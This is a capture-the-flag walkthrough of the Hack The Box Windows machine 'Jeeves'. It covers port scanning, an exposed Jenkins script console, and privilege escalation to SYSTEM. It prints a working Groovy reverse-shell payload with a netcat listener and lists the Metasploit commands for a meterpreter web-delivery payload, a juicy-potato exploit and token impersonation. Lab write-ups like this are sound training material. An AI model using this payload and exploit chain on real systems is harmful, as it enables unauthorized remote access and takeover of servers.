Hackthebox - Jeeves

• Windows

Jeeves

• Box on HTB

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.63                                                                                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:34 EDT
Nmap scan report for 10.10.10.63
Host is up (0.025s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|10|7|Vista (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows 10 1607 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%), Microsoft Windows 7 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-04-08T22:44:11
|_  start_date: 2022-04-08T22:41:38
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 5h07m23s, deviation: 0s, median: 5h07m23s

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   24.57 ms 10.10.14.1
2   24.81 ms 10.10.10.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.40 seconds

Port 80

• We have this page
• It seems gives stack trace when trying to search for something
• But it is just an image, indeed the action of the form will just go to error.html
• Gobuster does not give much

Port 50000

• Here is what we see on the browser for this port:
• Gosbuster does not always work for the first time we need to use different wordlists, I tried a few before getting to the askjeeves result. The one that gave the result is directory-list-2.3-big.txt
• If we navigate to /askjeeves we have a jenkins server
• If we go to jenkins cli we can use a jar and execute command from it
• If we look at the system info we get a user name: kohsuke

• Script console also seems interesting, let's try to get a reverse shell this way We can find one online here:

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

• Let's set a listener rlwrap nc -lvp 8044

• It works we are jeeves\kohsuke

image

• We can grab our user flag type C:\Users\kohsuke\Desktop\user.txt

• Here are our privileges We have the SeImpersonatePrivilege enabled
• We can use windows exploit suggester with sysinfo

  • wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

  • python windows-exploit-suggester.py -update (to get the latest db file)

  • python windows-exploit-suggester.py --database 2022-04-08-mssb.xls -i ../sysinfo.txt

• We have a lot of options including potatoes

Privesc with rotten potato

• Launch msfconsole

• use exploit/multi/script/web_delivery

• show targets

• set target 2 for PSH

• set payload windows/meterpreter/reverse_tcp

• set lhost tun0

• set SRVHOST tun0
• Now we just need to execute this in our target
• And we get a meterpreter session
• Let's interact with it sessions -i 1

• To get the build in potato options lets use metasploit exploit suggester run post/multi/recon/local_exploit_suggester
• Using ctrl+z lets now background the shell

• use exploit/windows/local/ms16_075_reflection_juicy

• show options

• set session 1

• set LHOST tun0

• run
• And it worked
• load incognito

• list_tokens -u

• impersonate_token "NT AUTHORITY\SYSTEM"

• Event though we got authority system the root flag is not here instead we have this
• if we dir /R we can see our flag

• more < hm.txt:root.txt:$DATA we can do this to print it

• Here are a few methods on how to print alternate data streams